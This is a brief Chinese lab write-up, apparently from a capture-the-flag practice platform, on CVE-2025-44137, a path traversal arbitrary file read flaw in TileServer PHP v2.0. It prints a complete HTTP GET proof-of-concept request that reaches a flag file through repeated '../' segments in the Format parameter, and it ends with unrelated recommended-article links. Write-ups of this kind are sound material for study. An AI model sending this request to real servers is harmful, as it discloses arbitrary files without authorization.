【春秋云境】CVE-2025-44137 TileServer PHP v2.0任意文件读取漏洞

1、靶场介绍

TileServer PHP是MapTiler开源的一个文件夹托管软件。 TileServer PHP v2.0版本存在安全漏洞,该漏洞源于renderTile函数允许路径遍历,可能导致读取任意文件

2、POC

yaml 复制代码
GET /tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../flag&Request=x&layer=. HTTP/1.1
Host: 39.106.48.123:26282
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

3、总结

没什么总结的,从git上一搜就搜到POC了。

相关推荐
忙碌54412 小时前
OpenTelemetry实战指南:构建云原生全链路可观测性体系
ios·flink·apache·iphone
悠闲蜗牛�16 小时前
Apache Flink实时计算实战指南:从流处理到数据湖仓一体的架构演进
架构·flink·apache
2301_816997882 天前
Apache Commons工具类
apache
心雨⁢⁢⁣2 天前
RocketMq(Apache RocketMQ 5.2.1-SNAPSHOT)消息消费流程
apache·rocketmq·java-rocketmq
切糕师学AI2 天前
Apache ZooKeeper 简介
分布式·zookeeper·apache
忙碌5442 天前
实时流处理架构深度剖析:Apache Flink在实时数仓与风控系统的工程实践
架构·flink·apache
x***r1515 天前
phpstudy_x64_8.1.1.3安装教程(含Apache/MySQL启动与端口修改)
数据库·mysql·apache
小白blog6 天前
day28:求小数位数个数、进制转换、表达式求值
apache
x-cmd8 天前
[特殊字符] 新年新气象|x-cmd v0.8.3:Apache 2.0、Minimax M2.5、Claude Code 一键切换
ai·apache·agent·claude·x-cmd·minimax
vortex59 天前
在 Apache 中完整开启 .shtml (SSI) 解析
apache